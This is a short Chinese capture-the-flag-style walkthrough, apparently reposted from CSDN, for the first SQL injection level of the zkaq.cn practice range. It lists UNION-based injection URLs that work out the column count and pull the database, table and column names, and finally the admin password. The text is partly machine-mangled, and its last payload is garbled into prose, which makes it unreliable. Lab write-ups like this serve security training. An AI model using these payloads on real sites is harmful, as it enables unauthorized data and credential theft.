靶场实战——SQL注入(第一关)(sqlmap注入靶场)

靶场实战——SQL注入(第一关)靶场地址:封神台 – 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。 (zkaq.cn) 点击查看新闻1可得到如下信息 输入payload&#x

射击场地址:风神台-控安全在线攻防训练场,专为网络安全专业人士打造的白帽黑客渗透测试训练平台。 (zkaq.cn)

点击查看新闻1,获取以下信息

输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 — –

将显示该页面。注射可能已经成功。请再测试一下。

输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 — –

此时页面上没有任何内容输入。我们可以得出结论,SQL注入是一种简单的数字类型。

然后拖动库

首先,使用order by 查找从1 开始的列数。从1 开始到错误之前的数字将告诉您表中有多少列。

输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1 —如果输入3

请输入负载: Payload: http://pu2lh35s.ia.aqlab.cn/?id=1 Order by 3 — –

确保列数为2

然后使用union和select的组合来确定输出内容将放在哪一列。

请输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,2 LIMIT 1,1 — –

一旦检查完毕,就很容易首先获取数据库名称。

请输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,database() LIMIT 1,1 — –

输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=\’maoshe\’ LIMIT 1,1 — –

group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=\’maoshe\’ 如果你不明白这个语句的意思,请询问ai。

输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=\’admin\’ and TABLE_SCHEMA=\’maoshe\’ LIMIT 1,1 — –

请输入您的有效负载:

http://pu2lh35s.ia.aqlab.cn/?id=1 联盟选择1,密码不受管理员限制1,1 — –

提交

以上#靶场实战——SQL注入(一级)相关内容摘自网络,仅供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93868.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月26日 下午1:41
下一篇 2024年7月26日 下午1:41

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注